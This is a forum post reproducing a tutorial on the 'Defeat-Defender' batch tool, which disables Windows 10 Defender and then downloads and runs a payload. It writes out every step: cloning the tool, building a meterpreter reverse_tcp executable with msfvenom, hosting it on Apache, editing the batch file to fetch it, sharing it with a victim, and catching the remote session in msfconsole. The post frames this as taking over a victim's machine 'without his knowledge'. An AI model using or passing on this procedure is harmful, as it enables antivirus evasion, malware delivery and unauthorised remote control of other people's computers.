• We just launched and are currently in beta. Join us as we build and grow the community.

Create FUD (Fully Undetectable) Payload for Windows 10

amrica

Search Guru
A Rep
0
0
0
Rep
0
A Vouches
0
0
0
Vouches
0
Posts
169
Likes
94
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
Dark-Green-and-White-Hat-Fashion-Collection-YouTube-Thumbnail.png


Hey Folks, in this tutorial we are going to talk about an open source tool called “Defeat-Defender“, which is coded in batch language and designed to defeat the security defender of windows operating system and to get access to the system. Keep in mind that it is capable of bypassing windows 10 operating system defender easily, even you can try it yourself.

Let’s take a look 😛 !!

Methodology of Defeat-Defender

Originally the developer of this tool used only simple logics to defeat Windows 10 Defender. As we know that windows allows us to donwload any batch file from external network and by taking advantage of this feature, it first dismantles all security and defenders using the administrative command prompt of window and once done, it downloads the payload from the target web server and executes it without any restrictions.

Installation

Now we download this tool from gihtub using git command and go inside the directory of this tool.

git clone https://github.com/swagkarna/Defeat-Defender.git
cd Defeat-Defender12git clone
https://github.com/swagkarna/Defeat-Defender.gitcd Defeat-Defender

1-1.png

Create Payload

Once inside the directory of this device, we will create a payload and move the payload to the root directory of the apache web server so that it can be hosted.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=4444 -f exe > window.exe
cp window.exe /var/www/html/
systemctl start apache2123msfvenom-pwindows/meterpreter/reverse_tcp lhost=192.168.1.13lport=4444-fexe>window.execp window.exe/var/www/html/systemctl start apache2

2-2.png


Now we need to edit the “Defeat-Defender.bat” file. So open it using nano command, go to the bottom and you will see as shown in the image below.

nano Defeat-Defender.bat1nano Defeat-Defender.bat

3-2.png


Now we need to remove the highlighted and give the location of our own apache web server along with payload name. Keep in mind that rename “payload. exe” everywhere to “window.exe“.

4-2.png


Alright 😛 !! Everything is done and now the highlighted batch file is ready for sharing. You can share it as per your own but in our case we will start python file sharing service to share this file.

python -m SimpleHTTPServer1python-mSimpleHTTPServer

5-2.png

PoC ( Proof )

As you can see the window defender is already active in the victim machine.

6-3.png


Great 😛 !! You can see in the image below that the malicious file has been successfully downloaded to a windows machine without being detected by the defender.

7-4.png


Hmm 😛 !! Usually when we install any application we need to give admin privileges to configure it, but this time also victim will allow us to disable all security by clicking Yes.

8-3.png


Once the victim has allowed the application to be configured, then a message will popping up on the screen as shown in the image below.

9-3.png


Amazing 😛 !! But in fact we get a meterpreter session of that user without his knowledge.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 4444
run123456msfconsoleuseexploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost192.168.1.13set lport4444run

meter.png


As you have seen how easily it has defeated the defender of Windows 10 machine.

About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 

432,289

312,550

312,559

Top